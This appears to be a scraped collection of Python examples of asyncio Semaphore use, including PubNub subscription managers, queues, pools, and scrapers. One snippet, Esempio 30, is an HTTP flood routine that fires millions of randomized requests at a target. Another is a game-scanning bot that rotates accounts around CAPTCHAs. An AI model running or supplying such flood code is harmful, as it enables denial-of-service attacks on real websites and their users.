class Collector(CompileStateListener):
        """
        Collect all state updates, optionally hang the processing of listeners
        """
        def __init__(self):
            self.seen = []
            self.preseen = []
            self.lock = Semaphore(1)

        def reset(self):
            self.seen = []
            self.preseen = []

        async def compile_done(self, compile: data.Compile):
            self.preseen.append(compile)
            print("Got compile done for ", compile.remote_id)
            async with self.lock:
                self.seen.append(compile)

        async def hang(self):
            await self.lock.acquire()

        def release(self):
            self.lock.release()

        def verify(self, envs: uuid.UUID):
            assert sorted([x.remote_id for x in self.seen]) == sorted(envs)
            self.reset()
Esempio n. 2
0
    def __init__(self, pubnub_instance):
        subscription_manager = self

        self._message_worker = None
        self._message_queue = Queue()
        self._subscription_lock = Semaphore(1)
        self._subscribe_loop_task = None
        self._heartbeat_periodic_callback = None
        self._reconnection_manager = AsyncioReconnectionManager(pubnub_instance)

        super(AsyncioSubscriptionManager, self).__init__(pubnub_instance)
        self._start_worker()

        class AsyncioReconnectionCallback(ReconnectionCallback):
            def on_reconnect(self):
                subscription_manager.reconnect()

                pn_status = PNStatus()
                pn_status.category = PNStatusCategory.PNReconnectedCategory
                pn_status.error = False

                subscription_manager._subscription_status_announced = True
                subscription_manager._listener_manager.announce_status(pn_status)

        self._reconnection_listener = AsyncioReconnectionCallback()
        self._reconnection_manager.set_reconnection_listener(self._reconnection_listener)
Esempio n. 3
0
 def __init__(self, worker_q, ws, map_jobs, n_reducer=30, url=""):
     '''
     worker_q: we put availabe workers into this priority queue.
     ws: a websocket connection object.
     map_jobs: a list storing all map tasks
     (more precisely: which part of the input file)
     n_reducer: Number of reducer.
     '''
     super(scheduler, self).__init__()
     self.url_list = []
     self.url = url
     self.mutex = Semaphore()
     self.map_jobs = map_jobs
     self.n_reducer = n_reducer
     self.stoprequest = threading.Event()
     self.worker_q = worker_q
     self.ws = ws
     self.dead_worker = set()
     self.mapCount = 0
     self.reduceCount = n_reducer
     # a dict used to track status of all map/reduce jobs,
     # entities in map_jobs are keys,
     # a list of worker(if not finished) or None object(if finished)
     # is the corresponding value
     self.map_status = {}
     self.reduce_status = {}
     self.tid_map = {}
     for job in map_jobs:
         self.map_status[job] = []
     for i in range(n_reducer):
         self.reduce_status[i] = []
Esempio n. 4
0
    def __init__(self, connector, pool_size, connection_cls):
        self.pool_size = pool_size
        self.pool = set()
        self.sem = Semaphore(pool_size)

        for _ in range(pool_size):
            self.pool.add(connection_cls(connector))
Esempio n. 5
0
 def __init__(self, n_slots):
     self._n_slots = n_slots
     self._wait_tx = OrderedDict()
     self._wait_tx_sem = Semaphore(0)
     self._wait_rx = OrderedDict()
     self._not_full = Event()
     self._not_full.set()
Esempio n. 6
0
 def __init__(self, opener, address, max_size=1, max_age=None):
     self._opener = opener
     self._address = address
     self._max_size = max_size
     self._max_age = max_age
     self._in_use_list = deque()
     self._free_list = deque()
     self._slots = Semaphore(self._max_size)
Esempio n. 7
0
 def __init__(self, pubnub_instance):
     self._message_worker = None
     self._message_queue = Queue()
     self._subscription_lock = Semaphore(1)
     self._subscribe_loop_task = None
     self._heartbeat_periodic_callback = None
     super(AsyncioSubscriptionManager, self).__init__(pubnub_instance)
     self._start_worker()
Esempio n. 8
0
async def worker(xs: List[int], pred: Callable[[int], bool],
                 res: List[List[int]], semaphore: asyncio.Semaphore) -> None:
    for x in xs:
        await semaphore.acquire()
        if pred(x):
            res[0].append(x)
        semaphore.release()
        await asyncio.sleep(0.000000001)
Esempio n. 9
0
 def __init__(self):
     self.barreira = Barreira(4)  # Garante que 4 estarão no barco
     self.mutex = Lock()  # Protege acesso às variáveis ufcg e uepb
     self.ufcg = 0  # Número de alunos da UFCG aguardando
     self.uepb = 0  # Número de alunos da UEPB aguardando
     self.embarque_ufcg = Semaphore(
         0)  # Controla o aviso de que aluno da UFCG pode entrar no barco
     self.embarque_uepb = Semaphore(
         0)  # Controla o aviso de que aluno da UEPB pode entrar no barco
Esempio n. 10
0
 def __init__(self,
              wordle_instance: Wordle,
              group: Union[Group, int],
              member: Optional[Union[Member, int]] = None):
     self.wordle = wordle_instance
     self.group = group if isinstance(group, int) else group.id
     self.member = (member if isinstance(member, int) else
                    member.id) if member else None
     self.member_list = set()
     self.member_list_mutex = Semaphore(1)
Esempio n. 11
0
async def get_some_dress(semaphore: Semaphore):
    await semaphore.acquire(
    )  # занимаем примерочную, счетчик свободных примерочных уменьшится на 1
    start = time.time()
    await main_task()
    time_of_work = time.time() - start
    print("ВРЕМЯ РАБОТЫ:", time_of_work)
    await asyncio.sleep(1 - time_of_work)
    semaphore.release(
    )  # освобождаем примерочную, счетчик свободных примерочных увеличится на 1
Esempio n. 12
0
 def __init__(self, assembler: PayloadStreamAssembler):
     self._assembler = assembler
     self._buffer_queue: List[List[int]] = []
     self._lock = Lock()
     self._data_available = Semaphore(0)
     self._producer_length = 0  # total length
     self._consumer_position = 0  # read position
     self._active: List[int] = []
     self._active_offset = 0
     self._end = False
Esempio n. 13
0
 def __init__(self, loop=None):
     logger.info('Worker initialising...')
     loop = loop or asyncio.get_event_loop()
     self.loop = loop
     logger.debug('Connecting to db: "%s"', DB_DSN)
     self._pool = loop.run_until_complete(create_pool(dsn=DB_DSN, loop=loop, minsize=2, maxsize=10))
     self.wkh2p_sema = Semaphore(value=MAX_WORKER_THREADS, loop=loop)
     self.worker_sema = Semaphore(value=MAX_WORKER_JOBS, loop=loop)
     self.redis = None
     self.exc_info = None
Esempio n. 14
0
 def __init__(self, addr, configuration, maxconnections):
     self._addr = addr
     self._configuration = configuration
     if not maxconnections:
         raise Exception('Please set a maximum limit of connections in the pool')
     self._limit = Semaphore(maxconnections)
     self._available = deque()
     self._inuse = set()
     self._fast = None
     self._lock = Lock()
Esempio n. 15
0
async def analyze(cli_args: argparse.Namespace, domain: str,
                  recursion_level: int, results_queue: asyncio.Queue,
                  sem: asyncio.Semaphore, input_domains_queue: asyncio.Queue):

    tasks = []
    try:
        #
        # Getting info from AWS
        #
        t1 = asyncio.create_task(
            get_s3(cli_args, domain, recursion_level, input_domains_queue,
                   results_queue))

        tasks.append(t1)

    except Exception as e:
        print(e)

    try:
        #
        # Get web links?
        #
        if not cli_args.no_links:
            t2 = asyncio.create_task(
                get_links(cli_args, domain, recursion_level,
                          input_domains_queue, results_queue))

            tasks.append(t2)

    except Exception as e:
        print(e)

    try:
        #
        # Get cnames
        #
        # if cli_args.dns:
        if not cli_args.no_dnsdiscover:
            t3 = asyncio.create_task(
                get_dns_info(cli_args, domain, recursion_level,
                             input_domains_queue))

            tasks.append(t3)

    except Exception as e:
        print(e)

    try:
        await asyncio.gather(*tasks)
    finally:
        sem.release()
        input_domains_queue.task_done()
Esempio n. 16
0
class Barreira:
    def __init__(self, n):
        self.n = n  # Número de threads aguardadas
        self.contador = 0  # Número de threads até o momento
        self.barreira_1 = Semaphore(0)  # Proteção de entrada da barreira
        self.barreira_2 = Semaphore(1)  # Proteção de saída da barreira
        self.mutex = Lock()  # Protege acesso à variável contador

    '''
  Aguarda entrada na barreira.
  '''

    async def acquire_1(self):
        async with self.mutex:
            self.contador += 1
            if self.contador == self.n:
                await self.barreira_2.acquire()
                self.barreira_1.release()

        await self.barreira_1.acquire()
        self.barreira_1.release()

    '''
  Aguarda saída da barreira.
  '''

    async def acquire_2(self):
        async with self.mutex:
            self.contador -= 1
            if self.contador == 0:
                await self.barreira_1.acquire()
                self.barreira_2.release()

        await self.barreira_2.acquire()
        self.barreira_2.release()
Esempio n. 17
0
class FifoQueue:
    def __init__(self):
        self._queue = deque()
        self._semaphore = Semaphore(0)

    def __len__(self):
        return len(self._queue)

    async def push(self, request):
        self._queue.append(request)
        self._semaphore.release()

    async def pop(self):
        await self._semaphore.acquire()
        return self._queue.popleft()
Esempio n. 18
0
async def frequency_limiter(sem: Semaphore) -> None:
    """
    Function that must be used only inside router module
    to wait some time before answer to the client and let the background task to start

    :param sem: semaphore to store iot or user data
    """
    try:
        await wait_for(sem.acquire(), 1)
        sem.release()

    except TimeoutError:
        raise HTTPException(
            status_code=status.HTTP_503_SERVICE_UNAVAILABLE,
            headers={"Retry-After": str(randrange(1, 29) * random() + 1)},
        )
Esempio n. 19
0
    def __init__(self, args: argparse.Namespace):
        self.timeout = args.timeout
        self.use_mpi = args.version.startswith("p")
        default_ompthreads = 2 if "smp" in args.version else 1
        self.ompthreads = args.ompthreads if args.ompthreads else default_ompthreads
        self.mpiranks = args.mpiranks if self.use_mpi else 1
        self.num_workers = int(args.maxtasks / self.ompthreads / self.mpiranks)
        self.workers = Semaphore(self.num_workers)
        self.cp2k_root = Path(__file__).resolve().parent.parent.parent
        self.mpiexec = args.mpiexec.split()
        self.keepalive = args.keepalive
        self.arch = args.arch
        self.version = args.version
        self.debug = args.debug
        self.max_errors = args.maxerrors
        self.restrictdirs = args.restrictdir if args.restrictdir else [".*"]
        datestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
        leaf_dir = f"TEST-{args.arch}-{args.version}-{datestamp}"
        self.work_base_dir = (args.workbasedir / leaf_dir if args.workbasedir
                              else self.cp2k_root / "regtesting" / leaf_dir)
        self.error_summary = self.work_base_dir / "error_summary"

        def run_with_capture_stdout(cmd: str) -> bytes:
            # capture_output argument not available before Python 3.7
            return subprocess.run(cmd, shell=True, stdout=PIPE,
                                  stderr=DEVNULL).stdout

        # Detect number of GPU devices.
        nv_cmd = "nvidia-smi --query-gpu=gpu_name --format=csv,noheader | wc -l"
        nv_gpus = int(run_with_capture_stdout(nv_cmd))
        amd_cmd = "rocm-smi --showid --csv | grep card | wc -l"
        amd_gpus = int(run_with_capture_stdout(amd_cmd))
        self.num_gpus = nv_gpus + amd_gpus
        self.next_gpu = 0  # Used to assign devices round robin to processes.
Esempio n. 20
0
    def __init__(self, pubnub_instance):
        subscription_manager = self

        self._message_worker = None
        self._message_queue = Queue()
        self._subscription_lock = Semaphore(1)
        self._subscribe_loop_task = None
        self._heartbeat_periodic_callback = None
        self._reconnection_manager = AsyncioReconnectionManager(pubnub_instance)

        super(AsyncioSubscriptionManager, self).__init__(pubnub_instance)
        self._start_worker()

        class AsyncioReconnectionCallback(ReconnectionCallback):
            def on_reconnect(self):
                subscription_manager.reconnect()

                pn_status = PNStatus()
                pn_status.category = PNStatusCategory.PNReconnectedCategory
                pn_status.error = False

                subscription_manager._subscription_status_announced = True
                subscription_manager._listener_manager.announce_status(pn_status)

        self._reconnection_listener = AsyncioReconnectionCallback()
        self._reconnection_manager.set_reconnection_listener(self._reconnection_listener)
Esempio n. 21
0
class PriorityQueue:
    def __init__(self):
        self._queue = []
        self._semaphore = Semaphore(0)

    def __len__(self):
        return len(self._queue)

    async def push(self, request):
        heappush(self._queue, _PriorityQueueItem(request))
        self._semaphore.release()

    async def pop(self):
        await self._semaphore.acquire()
        item = heappop(self._queue)
        return item.request
Esempio n. 22
0
 def __init__(self, args: argparse.Namespace):
     self.timeout = args.timeout
     self.use_mpi = args.version.startswith("p")
     self.ompthreads = args.ompthreads
     self.mpiranks = args.mpiranks if self.use_mpi else 1
     self.num_workers = int(args.maxtasks / self.ompthreads / self.mpiranks)
     self.workers = Semaphore(self.num_workers)
     self.cp2k_root = Path(__file__).resolve().parent.parent.parent
     datestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
     leaf_dir = f"TEST-{args.arch}-{args.version}-{datestamp}"
     self.work_base_dir = self.cp2k_root / "regtesting" / leaf_dir
     self.error_summary = self.work_base_dir / "error_summary"
     self.keep_alive = args.keep_alive
     self.arch = args.arch
     self.version = args.version
     self.debug = args.debug
     self.max_errors = args.maxerrors
     self.restrictdirs = args.restrictdir if args.restrictdir else [".*"]
     nv_cmd = "nvidia-smi --query-gpu=gpu_name --format=csv,noheader | wc -l"
     nv_gpus = int(
         subprocess.run(nv_cmd, shell=True, capture_output=True).stdout)
     amd_cmd = "rocm-smi --showid --csv | grep card | wc -l"
     amd_gpus = int(
         subprocess.run(amd_cmd, shell=True, capture_output=True).stdout)
     self.num_gpus = nv_gpus + amd_gpus
     self.next_gpu = 0  # Used to assign devices round robin to processes.
Esempio n. 23
0
    async def check_is_router(
        cls, address: str, port: int,
        semaphore=Semaphore()) -> BaseIndustrialRouter:
        """
        Check if a certain router is an industrial router, given the headers defined at class level.

        :param address: IP address of the router to check.
        :param port: Port of the web interface of the device to check.
        :param semaphore: Asyncio semaphore to be used for concurrency limitation.
        :return: A :class:`aztarna.industrialrouters.scanner.BaseIndustrialRouter` object if the checked device is a router.
                None otherwise.
        """
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        context.options &= ~ssl.OP_NO_SSLv3
        async with semaphore:
            async with aiohttp.ClientSession(
                    timeout=ClientTimeout(2)) as client:
                uri = 'http://{}:{}'.format(address, port)
                print('[+] Connecting to {}'.format(address))
                async with client.get(uri, ssl=context) as response:
                    for field, values in cls.possible_headers:
                        if response.headers.get(field) in values:
                            router = cls.router_cls()
                            router.address = address
                            router.port = port
                            return router
                        else:
                            return None
Esempio n. 24
0
async def scrape(url_list):
    sem = Semaphore(semaphore)

    async with ClientSession() as session:
        return await gather(
            *
            [ensure_future(scrape_one(url, sem, session)) for url in url_list])
Esempio n. 25
0
async def fetch_with_sem(counter=0):
    header = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) '
                            'Chrome/86.0.4240.111 Safari/537.36'}

    sem = Semaphore(10)
    async with sem:
        async with ClientSession() as session:
            for url in list_of_urls:
                url = f'{url}{"/commits"}'
                async with session.get(url, headers=header) as response:
                    html_body = await response.read()
                    soup = BeautifulSoup(html_body, 'html.parser')
                content = soup.find_all('div', class_='flex-auto min-width-0')

                for data in content:
                    title = (data.find('div', class_='f6 text-gray min-width-0').
                             find('a', class_='commit-author ''user-mention').get_text().strip('')
                             if data.find('a', class_='commit-author user-mention') else None)

                    message = (data.find('a', class_='link-gray-dark').get_text()
                               if data.find('a', class_='link-gray-dark') else None)

                    timestamp = (data.find('relative-time', class_='no-wrap').get_text()
                                 if data.find('relative-time', class_='no-wrap') else None)

                    counter += 1

                    df = {
                        'title': title,
                        'message': message,
                        'timestamp': timestamp,
                    }

                    commitframe.append(df)
                print(f'Total commits saved: {counter}')
Esempio n. 26
0
async def fetcher(database):
    """Fetch all the feeds"""

    # disable certificate validation to cope with self-signed certificates in some feed back-ends
    client = ClientSession(connector=TCPConnector(verify_ssl=False))
    sem = Semaphore(MAX_CONCURRENT_REQUESTS)

    queue = await connect_redis()
    while True:
        log.info("Beginning run.")
        tasks = []
        threshold = datetime.now() - timedelta(seconds=FETCH_INTERVAL)
        async with ClientSession() as session:
            while True:
                try:
                    job = await dequeue(queue, 'fetcher')
                    feed = await database.feeds.find_one({'_id': job['_id']})
                    last_fetched = feed.get('last_fetched', threshold)
                    if last_fetched <= threshold:
                        task = ensure_future(
                            throttle(sem, session, feed, client, database,
                                     queue))
                        tasks.append(task)
                except Exception:
                    log.error(format_exc())
                    break
            responses = gather(*tasks)
            await responses
            log.info("Run complete, sleeping %ds...", CHECK_INTERVAL)
            await sleep(CHECK_INTERVAL)
    queue.close()
    await queue.wait_closed()
Esempio n. 27
0
async def perform_request(conn: Optional[aiohttp.TCPConnector], i: int,
                          sem: asyncio.Semaphore, url: str):
    t0 = time.time()
    try:
        async with aiohttp.request('get', url, connector=conn) as resp:
            # Read wjhole response without buffering.
            chunk = True
            while chunk:
                chunk = await resp.content.read(1024 * 1024)

            delta = time.time() - t0
            LOG.info("[%d] HTTP %d after %s seconds", i, resp.status, delta)
    except aiohttp.client_exceptions.ClientConnectorError as e:
        LOG.info("[%d] %s", i, e)
    finally:
        sem.release()
Esempio n. 28
0
    async def interval_task(self):
        try:
            to_backup = self.bot.db.intervals.find(
                {"next": {
                    "$lt": datetime.utcnow()
                }})
            semaphore = Semaphore(10)
            async for interval in to_backup:

                async def run_interval():
                    try:
                        next = datetime.utcnow() + timedelta(
                            minutes=interval["interval"])
                        await self.bot.db.intervals.update_one(
                            {"_id": interval["_id"]}, {"$set": {
                                "next": next
                            }})
                        await self.run_backup(interval["_id"])
                    finally:
                        semaphore.release()

                await semaphore.acquire()
                self.bot.loop.create_task(run_interval())
                await sleep(0)

        except Exception:
            pass
Esempio n. 29
0
 def __init__(self, manager):
     self.log = get_logger('overseer')
     self.workers = []
     self.manager = manager
     self.things_count = deque(maxlen=9)
     self.paused = False
     self.coroutines_count = 0
     self.skipped = 0
     self.visits = 0
     self.coroutine_semaphore = Semaphore(conf.COROUTINES_LIMIT, loop=LOOP)
     self.redundant = 0
     self.running = True
     self.all_seen = False
     self.idle_seconds = 0
     self.log.info('Overseer initialized')
     self.pokemon_found = ''
Esempio n. 30
0
async def Direct(session):
    url = Options.url
    header = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'en-US,en;',
        'Cache-Control': 'public, max-age=0',
        'Content-Encoding': 'deflate',
        'Connection': 'keep-alive',
        'Via': '1.1 Chrome-Compression-Proxy',
        'Host': Options.host
    }
    tasks = []
    sem = Semaphore(Options.threads)

    async def _call(i):
        try:
            header.update({
                "User-Agent": choice(Options.ua)
            })
            async with session.get(url=url + Functions.Cache(), allow_redirects=False, ssl=False, headers=header) as response:
                sem.release()
                if i % 1000 == 0:
                    Functions.Success("Target: {} | Thread: {} | Status: {}".format(url, i, response.status))
        except:
            pass

    for i in range(1, 10000000):
        await sem.acquire()
        task = ensure_future(_call(i))
        task.add_done_callback(tasks.remove)
        tasks.append(task)

    await wait(tasks)
    Functions.Success("Attack complete 10m of requests")
Esempio n. 31
0
File: main.py Progetto: messa/ow2
async def async_main(conf):
    async with AsyncExitStack() as stack:
        session = await stack.enter_async_context(ClientSession())
        stop_event = Event()
        get_running_loop().add_signal_handler(SIGINT, stop_event.set)
        get_running_loop().add_signal_handler(SIGTERM, stop_event.set)
        send_report_semaphore = Semaphore(2)
        check_tasks = []
        try:
            # create asyncio task for each configured check target
            for target in conf.targets:
                check_tasks.append(
                    create_task(
                        check_target(session, conf, target,
                                     send_report_semaphore)))
                await sleep(.1)
            # all set up and (hopefully) running
            done, pending = await wait(check_tasks + [stop_event.wait()],
                                       return_when=FIRST_COMPLETED)
            if not stop_event.is_set():
                raise Exception(
                    f'Some task(s) unexpectedly finished: {done!r}')
        finally:
            logger.debug('Cleanup...')
            for t in check_tasks:
                t.cancel()
Esempio n. 32
0
async def feed_fetcher(database):
    """Fetch all the feeds"""

    client = ClientSession(auth=BasicAuth(API_KEY))
    sem = Semaphore(MAX_CONCURRENT_REQUESTS)

    queue = await connect_redis()
    while True:
        log.info("Beginning run.")
        tasks = []
        async with client as session:
            while True:
                try:
                    job = await dequeue(queue, 'fetcher')
                    feed = await database.feeds.find_one(
                        {'advert_id': job['_id']})
                    task = ensure_future(
                        throttle(sem, session, feed, client, database, queue))
                    tasks.append(task)
                except Exception:
                    log.error(format_exc())
                    break
            responses = gather(*tasks)
            await responses
            log.info("Run complete, sleeping %ds...", CHECK_INTERVAL)
            await sleep(1)
    queue.close()
    await queue.wait_closed()
Esempio n. 33
0
async def hello(x: int, sem: asyncio.Semaphore):
    r = random.randint(1, 5)

    async for key in redis.iscan(match='something*'):
        print('Matched:', key)

    print("Waiting {}".format(x))
    await asyncio.sleep(r)
    print("Finish: " + str(x))

    print("Waiting {}".format(x))
    await asyncio.sleep(r)
    print("Finish: " + str(x))

    print("Waiting {}".format(x))
    await asyncio.sleep(r)
    print("Finish: " + str(x))

    f = asyncio.Future()

    sem.release()
Esempio n. 34
0
 def __init__(self, manager):
     self.log = get_logger('overseer')
     self.workers = []
     self.manager = manager
     self.things_count = deque(maxlen=9)
     self.paused = False
     self.coroutines_count = 0
     self.skipped = 0
     self.visits = 0
     self.coroutine_semaphore = Semaphore(conf.COROUTINES_LIMIT, loop=LOOP)
     self.redundant = 0
     self.running = True
     self.all_seen = False
     self.idle_seconds = 0
     self.log.info('Overseer initialized')
     self.pokemon_found = ''
Esempio n. 35
0
class AsyncioSubscriptionManager(SubscriptionManager):
    def __init__(self, pubnub_instance):
        subscription_manager = self

        self._message_worker = None
        self._message_queue = Queue()
        self._subscription_lock = Semaphore(1)
        self._subscribe_loop_task = None
        self._heartbeat_periodic_callback = None
        self._reconnection_manager = AsyncioReconnectionManager(pubnub_instance)

        super(AsyncioSubscriptionManager, self).__init__(pubnub_instance)
        self._start_worker()

        class AsyncioReconnectionCallback(ReconnectionCallback):
            def on_reconnect(self):
                subscription_manager.reconnect()

                pn_status = PNStatus()
                pn_status.category = PNStatusCategory.PNReconnectedCategory
                pn_status.error = False

                subscription_manager._subscription_status_announced = True
                subscription_manager._listener_manager.announce_status(pn_status)

        self._reconnection_listener = AsyncioReconnectionCallback()
        self._reconnection_manager.set_reconnection_listener(self._reconnection_listener)

    def _set_consumer_event(self):
        if not self._message_worker.cancelled():
            self._message_worker.cancel()

    def _message_queue_put(self, message):
        self._message_queue.put_nowait(message)

    def _start_worker(self):
        consumer = AsyncioSubscribeMessageWorker(self._pubnub,
                                                 self._listener_manager,
                                                 self._message_queue, None)
        self._message_worker = asyncio.ensure_future(consumer.run(),
                                                     loop=self._pubnub.event_loop)

    def reconnect(self):
        # TODO: method is synchronized in Java
        self._should_stop = False
        self._subscribe_loop_task = asyncio.ensure_future(self._start_subscribe_loop())
        self._register_heartbeat_timer()

    def disconnect(self):
        # TODO: method is synchronized in Java
        self._should_stop = True
        self._stop_heartbeat_timer()
        self._stop_subscribe_loop()

    def stop(self):
        super(AsyncioSubscriptionManager, self).stop()
        self._reconnection_manager.stop_polling()
        if self._subscribe_loop_task is not None and not self._subscribe_loop_task.cancelled():
            self._subscribe_loop_task.cancel()

    @asyncio.coroutine
    def _start_subscribe_loop(self):
        self._stop_subscribe_loop()

        yield from self._subscription_lock.acquire()

        combined_channels = self._subscription_state.prepare_channel_list(True)
        combined_groups = self._subscription_state.prepare_channel_group_list(True)

        if len(combined_channels) == 0 and len(combined_groups) == 0:
            self._subscription_lock.release()
            return

        self._subscribe_request_task = asyncio.ensure_future(Subscribe(self._pubnub)
                                                             .channels(combined_channels)
                                                             .channel_groups(combined_groups)
                                                             .timetoken(self._timetoken).region(self._region)
                                                             .filter_expression(self._pubnub.config.filter_expression)
                                                             .future())

        e = yield from self._subscribe_request_task

        if self._subscribe_request_task.cancelled():
            self._subscription_lock.release()
            return

        if e.is_error():
            if e.status is not None and e.status.category == PNStatusCategory.PNCancelledCategory:
                self._subscription_lock.release()
                return

            if e.status is not None and e.status.category == PNStatusCategory.PNTimeoutCategory:
                self._pubnub.event_loop.call_soon(self._start_subscribe_loop)
                self._subscription_lock.release()
                return

            logger.error("Exception in subscribe loop: %s" % str(e))

            if e.status is not None and e.status.category == PNStatusCategory.PNAccessDeniedCategory:
                e.status.operation = PNOperationType.PNUnsubscribeOperation

            # TODO: raise error
            self._listener_manager.announce_status(e.status)

            self._reconnection_manager.start_polling()
            self._subscription_lock.release()
            self.disconnect()
            return
        else:
            self._handle_endpoint_call(e.result, e.status)
            self._subscription_lock.release()
            self._subscribe_loop_task = asyncio.ensure_future(self._start_subscribe_loop())

        self._subscription_lock.release()

    def _stop_subscribe_loop(self):
        if self._subscribe_request_task is not None and not self._subscribe_request_task.cancelled():
            self._subscribe_request_task.cancel()

    def _stop_heartbeat_timer(self):
        if self._heartbeat_periodic_callback is not None:
            self._heartbeat_periodic_callback.stop()

    def _register_heartbeat_timer(self):
        super(AsyncioSubscriptionManager, self)._register_heartbeat_timer()

        self._heartbeat_periodic_callback = AsyncioPeriodicCallback(
            self._perform_heartbeat_loop,
            self._pubnub.config.heartbeat_interval * 1000,
            self._pubnub.event_loop)
        if not self._should_stop:
            self._heartbeat_periodic_callback.start()

    @asyncio.coroutine
    def _perform_heartbeat_loop(self):
        if self._heartbeat_call is not None:
            # TODO: cancel call
            pass

        cancellation_event = Event()
        state_payload = self._subscription_state.state_payload()
        presence_channels = self._subscription_state.prepare_channel_list(False)
        presence_groups = self._subscription_state.prepare_channel_group_list(False)

        if len(presence_channels) == 0 and len(presence_groups) == 0:
            return

        try:
            heartbeat_call = (Heartbeat(self._pubnub)
                              .channels(presence_channels)
                              .channel_groups(presence_groups)
                              .state(state_payload)
                              .cancellation_event(cancellation_event)
                              .future())

            envelope = yield from heartbeat_call

            heartbeat_verbosity = self._pubnub.config.heartbeat_notification_options
            if envelope.status.is_error:
                if heartbeat_verbosity == PNHeartbeatNotificationOptions.ALL or \
                        heartbeat_verbosity == PNHeartbeatNotificationOptions.ALL:
                    self._listener_manager.announce_stateus(envelope.status)
            else:
                if heartbeat_verbosity == PNHeartbeatNotificationOptions.ALL:
                    self._listener_manager.announce_stateus(envelope.status)

        except PubNubAsyncioException as e:
            pass
            # TODO: check correctness
            # if e.status is not None and e.status.category == PNStatusCategory.PNTimeoutCategory:
            #     self._start_subscribe_loop()
            # else:
            #     self._listener_manager.announce_status(e.status)
        finally:
            cancellation_event.set()

    def _send_leave(self, unsubscribe_operation):
        asyncio.ensure_future(self._send_leave_helper(unsubscribe_operation))

    @asyncio.coroutine
    def _send_leave_helper(self, unsubscribe_operation):
        envelope = yield from Leave(self._pubnub) \
            .channels(unsubscribe_operation.channels) \
            .channel_groups(unsubscribe_operation.channel_groups).future()

        self._listener_manager.announce_status(envelope.status)
Esempio n. 36
0
class Overseer:
    def __init__(self, manager):
        self.log = get_logger('overseer')
        self.workers = []
        self.manager = manager
        self.things_count = deque(maxlen=9)
        self.paused = False
        self.coroutines_count = 0
        self.skipped = 0
        self.visits = 0
        self.coroutine_semaphore = Semaphore(conf.COROUTINES_LIMIT, loop=LOOP)
        self.redundant = 0
        self.running = True
        self.all_seen = False
        self.idle_seconds = 0
        self.log.info('Overseer initialized')
        self.pokemon_found = ''

    def start(self, status_bar):
        self.captcha_queue = self.manager.captcha_queue()
        Worker.captcha_queue = self.manager.captcha_queue()
        self.extra_queue = self.manager.extra_queue()
        Worker.extra_queue = self.manager.extra_queue()
        if conf.MAP_WORKERS:
            Worker.worker_dict = self.manager.worker_dict()

        for username, account in ACCOUNTS.items():
            account['username'] = username
            if account.get('banned'):
                continue
            if account.get('captcha'):
                self.captcha_queue.put(account)
            else:
                self.extra_queue.put(account)

        self.workers = tuple(Worker(worker_no=x) for x in range(conf.GRID[0] * conf.GRID[1]))
        db_proc.start()
        LOOP.call_later(10, self.update_count)
        LOOP.call_later(max(conf.SWAP_OLDEST, conf.MINIMUM_RUNTIME), self.swap_oldest)
        LOOP.call_soon(self.update_stats)
        if status_bar:
            LOOP.call_soon(self.print_status)

    def update_count(self):
        self.things_count.append(str(db_proc.count))
        self.pokemon_found = (
            'Pokemon found count (10s interval):\n'
            + ' '.join(self.things_count)
            + '\n')
        LOOP.call_later(10, self.update_count)

    def swap_oldest(self, interval=conf.SWAP_OLDEST, minimum=conf.MINIMUM_RUNTIME):
        if not self.paused and not self.extra_queue.empty():
            oldest, minutes = self.longest_running()
            if minutes > minimum:
                LOOP.create_task(oldest.lock_and_swap(minutes))
        LOOP.call_later(interval, self.swap_oldest)

    def print_status(self, refresh=conf.REFRESH_RATE):
        try:
            self._print_status()
        except CancelledError:
            return
        except Exception as e:
            self.log.exception('{} occurred while printing status.', e.__class__.__name__)
        self.print_handle = LOOP.call_later(refresh, self.print_status)

    async def exit_progress(self):
        while self.coroutines_count > 2:
            try:
                self.update_coroutines_count(simple=False)
                pending = len(db_proc)
                # Spaces at the end are important, as they clear previously printed
                # output - \r doesn't clean whole line
                print(
                    '{} coroutines active, {} DB items pending   '.format(
                        self.coroutines_count, pending),
                    end='\r'
                )
                await sleep(.5)
            except CancelledError:
                return
            except Exception as e:
                self.log.exception('A wild {} appeared in exit_progress!', e.__class__.__name__)

    def update_stats(self, refresh=conf.STAT_REFRESH, med=median, count=conf.GRID[0] * conf.GRID[1]):
        visits = []
        seen_per_worker = []
        after_spawns = []
        speeds = []

        for w in self.workers:
            after_spawns.append(w.after_spawn)
            seen_per_worker.append(w.total_seen)
            visits.append(w.visits)
            speeds.append(w.speed)

        self.stats = (
            'Seen per worker: min {}, max {}, med {:.0f}\n'
            'Visits per worker: min {}, max {}, med {:.0f}\n'
            'Visit delay: min {:.1f}, max {:.1f}, med {:.1f}\n'
            'Speed: min {:.1f}, max {:.1f}, med {:.1f}\n'
            'Extra accounts: {}, CAPTCHAs needed: {}\n'
        ).format(
            min(seen_per_worker), max(seen_per_worker), med(seen_per_worker),
            min(visits), max(visits), med(visits),
            min(after_spawns), max(after_spawns), med(after_spawns),
            min(speeds), max(speeds), med(speeds),
            self.extra_queue.qsize(), self.captcha_queue.qsize()
        )

        self.sighting_cache_size = len(SIGHTING_CACHE.store)
        self.mystery_cache_size = len(MYSTERY_CACHE.store)

        self.update_coroutines_count()
        self.counts = (
            'Known spawns: {}, unknown: {}, more: {}\n'
            '{} workers, {} coroutines\n'
            'sightings cache: {}, mystery cache: {}, DB queue: {}\n'
        ).format(
            len(spawns), len(spawns.unknown), spawns.cells_count,
            count, self.coroutines_count,
            len(SIGHTING_CACHE), len(MYSTERY_CACHE), len(db_proc)
        )
        LOOP.call_later(refresh, self.update_stats)

    def get_dots_and_messages(self):
        """Returns status dots and status messages for workers

        Dots meaning:
        . = visited more than a minute ago
        , = visited less than a minute ago, no pokemon seen
        0 = visited less than a minute ago, no pokemon or forts seen
        : = visited less than a minute ago, pokemon seen
        ! = currently visiting
        | = cleaning bag
        $ = spinning a PokéStop
        * = sending a notification
        ~ = encountering a Pokémon
        I = initial, haven't done anything yet
        » = waiting to log in (limited by SIMULTANEOUS_LOGINS)
        ° = waiting to start app simulation (limited by SIMULTANEOUS_SIMULATION)
        ∞ = bootstrapping
        L = logging in
